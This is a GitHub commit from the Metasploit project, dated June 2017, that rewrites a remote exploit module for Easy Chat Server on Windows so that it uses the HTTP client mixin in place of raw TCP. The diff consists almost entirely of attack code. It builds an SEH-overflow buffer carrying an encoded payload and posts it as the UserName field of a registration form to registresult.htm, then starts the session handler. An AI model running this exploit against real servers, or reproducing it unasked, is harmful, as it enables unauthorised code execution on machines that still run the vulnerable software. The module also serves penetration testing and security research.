Exploit now uses HTTP mixin

rapid7 · Jun 25, 2017 · 66eb89e · 66eb89e
1 parent a886525
commit 66eb89e
Showing 1 changed file with 21 additions and 8 deletions.
diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb
@@ -7,8 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::Tcp
-  #include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
@@ -18,8 +17,8 @@ def initialize(info = {})
       },
       'Author'         =>
         [
-          'Aitezaz Mohsin', #POC
-          'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
+          'Marco Rivoli', #Metasploit
+          'Aitezaz Mohsin' #POC
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -52,10 +51,24 @@ def exploit
     sploit << payload.encoded
     sploit << rand_text_alpha_upper(200)
 
-    request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
-    connect
-    sock.put(request)
+    res = send_request_cgi({
+      'uri'    => normalize_uri(URI,'registresult.htm'),
+      'method' => 'POST',
+      'vars_post'  => {
+        'UserName' => sploit,
+        'Password' => 'test',
+        'Password1' => 'test',
+        'Sex' => 1,
+        'Email' => 'x@',
+        'Icon' => 'x.gif',
+        'Resume' => 'xxxx',
+        'cw' => 1,
+        'RoomID' => 4,
+        'RepUserName' => 'admin',
+        'submit1' => 'Register'
+      }
+    })
     handler
-    disconnect
+
   end
 end